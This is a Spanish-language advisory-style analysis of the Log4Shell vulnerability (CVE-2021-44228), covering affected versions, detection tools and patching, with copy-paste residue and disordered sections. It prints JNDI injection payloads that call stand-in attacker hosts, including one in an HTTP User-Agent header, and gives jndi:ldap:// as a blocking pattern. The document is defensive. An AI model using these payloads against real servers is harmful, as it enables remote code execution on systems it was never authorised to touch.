
CVE-2021-44228
Informe de análisis Log4Shell de Igloo Corporation, Won Chi-hyun
CVE-2021-44228 Log4j es un registro gratuito y de código abierto de la Apache Software Foundation, basado en Java y aplicable a todas las aplicaciones. Registra los logs de diversos servicios basados en Java y proporciona una función para descubrir y consultar datos y objetos JNDI, así como para utilizar los recursos encontrados a través de JNDI Lookup de Java (LDAP 1389).
Descarga del archivo de imagen Docker para ejecutar el servidor vulnerable Asudo git clone sudo docker build . -t vulnerable-app Crea la imagen Docker en el directorio actual con la nueva imagen como vulnerable-app.
github.com/welk
Detener el servidor vulnerable no utilizado docker ps -a: verifica todas las imágenes Docker en ejecución docker container: verifica el ID del contenedor
Log4Shell (CVE-2021-44228) es una vulnerabilidad de ejecución remota de código (RCE, Remote Code Execution) descubierta en la librería Apache Log4j.
Los atacantes pueden ejecutar código arbitrario mediante payloads maliciosos, lo que puede causar daños generalizados.
Este informe analiza el principio, el impacto, los casos de explotación y los métodos de detección y respuesta de Log4Shell.
| Elemento | Descripción |
|---|---|
| Nombre de la vulnerabilidad | Log4Shell |
| Número de CVE | CVE-2021-44228 |
| Tipo de vulnerabilidad | Ejecución remota de código (RCE) |
| Versiones afectadas | Log4j 2.0-beta9 ~ 2.14.1 |
| Versión parcheada | Log4j 2.15.0 o superior |
| Dificultad de ataque | Baja (se puede explotar con solo introducir una cadena simple) |
| Gravedad | 🔥 Crítica (CVSS 10.0) |
Log4Shell permite a un atacante ejecutar código malicioso en un servidor remoto aprovechando una vulnerabilidad en la función de búsqueda JNDI (Java Naming and Directory Interface).
El atacante puede explotar la vulnerabilidad con solo dejar la siguiente cadena en el registro:
${jndi:ldap://attacker.com:1389/exploit}
4.1 Principales servicios y sistemas vulnerables
5.2 Ataque a aplicaciones web Se inserta un payload malicioso en campos que se registran en el log de las solicitudes HTTP, como User-Agent, Referer, X-Forwarded-For, etc. Ejemplo: css Copiar Editar GET / HTTP/1.1 Host: victim.com User-Agent: ${jndi:ldap://malicious.com:1389/exploit}
log4j-scan (https://github.com/fullhunt/log4j-scan) log4shell-detector (https://github.com/Neo23x0/log4shell-detector) ✅ Revisión de archivos de registro Si se detectan patrones como ${jndi:ldap://...} en los registros, se debe responder de inmediato. ✅ Monitoreo de red Verificar si hay solicitudes LDAP o RMI anómalas.
6.2 Medidas de respuesta ✅ Medidas inmediatas
Actualizar a la versión Log4j 2.15.0 o superior. Configurar la variable de entorno al ejecutar Java: shell Copiar Editar -Dlog4j2.formatMsgNoLookups=true Bloquear el patrón jndi:ldap:// en el firewall y en los sistemas IDS/IPS. ✅ Medidas de seguridad a largo plazo
Restringir el uso de JNDI y reforzar las políticas de seguridad. Aplicar un WAF (Web Application Firewall). Realizar revisiones de seguridad periódicas y escaneos de vulnerabilidades.
Parche y solución Versión de Log4j Medidas de respuesta 2.0-beta9 ~ 2.14.1 Vulnerable, requiere actualización 2.15.0 Búsqueda JNDI deshabilitada por defecto 2.16.0 Funcionalidad JNDI completamente eliminada 2.17.0 Medidas adicionales de refuerzo de seguridad ✅ Se recomienda actualizar a la versión más reciente (2.17.1 o superior).
Conclusión Log4Shell (CVE-2021-44228) está considerada una de las vulnerabilidades de seguridad más graves de los últimos años. ✅ Es esencial parchear rápidamente los sistemas vulnerables y realizar un monitoreo continuo de la seguridad. ✅ Se deben realizar revisiones de seguridad en todas las aplicaciones que utilicen Log4j.
Referencias Aviso oficial de seguridad de Apache Log4j NIST National Vulnerability Database (CVE-2021-44228) log4j-scan (GitHub)